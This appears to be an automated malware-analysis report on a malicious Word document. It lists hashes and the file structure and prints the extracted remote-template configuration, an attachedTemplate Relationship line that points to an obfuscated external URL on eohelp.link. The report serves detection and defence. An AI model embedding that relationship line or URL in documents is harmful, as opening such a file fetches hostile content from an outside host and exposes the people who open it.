Malicious
Malicious

5a8733d28bbca2b0baff0710622796fa

MS Word Document
|
MD5: 5a8733d28bbca2b0baff0710622796fa
|
Size: 972.16 KB
|
application/msword

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
5a8733d28bbca2b0baff0710622796fa
Sha1
04e30401928e56c1c4fe8b332d11840453fae3b9
Sha256
bee2f05c3ceadc6c18abff1bf32effb8da09bc054048e0521d028b99e746db04
Sha384
94e29445e77cc5f62ab07f0ef9c09c764dadcc82a2b9dbdc501c09c0c610eb1b8d657c91062e6e479d98c5b365ee40e2
Sha512
cc1063ad0cde89671b0b14fab6e921ac971d34fd9010b0dcd26cf5f2aba89db2f4cc0b5a83b7b1aba760fb48267cdc864c26de58013b7e60a8d3b39412241f84
SSDeep
24576:8obkGoX39mEFvIXE3vveYWNzdaL4UHvDnNZv15YrZR:GGodm7E/GrhUndqtR
TLSH
952533D559F20152CB18203EE84849B457DB99D370B2EFDA49EE61A867D81FF4BF8803
File Structure
5a8733d28bbca2b0baff0710622796fa
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
header2.xml
endnotes.xml
embeddings
oleObject1.bin
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
#Stream {69}
#Stream {8}
#Stream {10}
#Stream {16}
#Stream {18}
#Stream {24}
#Stream {26}
#Stream {37}
#Stream {45}
#Stream {47}
#Stream {56}
#Stream {58}
#Stream {64}
#Stream {66}
Structure
theme
theme1.xml
media
image1.emf
settings.xml
fontTable.xml
webSettings.xml
styles.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&/\/\/\/\/\/\/\/\/\/\
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&amp;/\/\/\/\/\/\/\/\/\/\" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Informations
Name
 Value
CONTENTS

1.7
CONTENTS

Beyza SÜN˚Ü
CONTENTS

D:20250128105624+03'00'
CONTENTS

D:20250128105624+03'00'
CONTENTS

Microsoft Word - 329
CONTENTS

Microsoft: Print To PDF
CONTENTS

Beyza SÜN˚Ü
CONTENTS

D:20250128105624+03'00'
CONTENTS

D:20250128105624+03'00'
CONTENTS

Microsoft: Print To PDF
CONTENTS

Microsoft Word - 329
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&/\/\/\/\/\/\/\/\/\/\
5a8733d28bbca2b0baff0710622796fa (972.16 KB)
File Structure
5a8733d28bbca2b0baff0710622796fa
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
header2.xml
endnotes.xml
embeddings
oleObject1.bin
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
#Stream {69}
#Stream {8}
#Stream {10}
#Stream {16}
#Stream {18}
#Stream {24}
#Stream {26}
#Stream {37}
#Stream {45}
#Stream {47}
#Stream {56}
#Stream {58}
#Stream {64}
#Stream {66}
Structure
theme
theme1.xml
media
image1.emf
settings.xml
fontTable.xml
webSettings.xml
styles.xml
docProps
app.xml
core.xml
Characteristics
Malware Configuration - Remote Template
Config. Field
 Value
Target

https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&/\/\/\/\/\/\/\/\/\/\
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&amp;/\/\/\/\/\/\/\/\/\/\" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value Location
Remote Template - Highly Suspicious

https:///\/\/\/\/\/\/\/\/\@eohelp.link/h9yKCA?&/\/\/\/\/\/\/\/\/\/\

Malicious

5a8733d28bbca2b0baff0710622796fa > word > _rels > settings.xml.rels
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙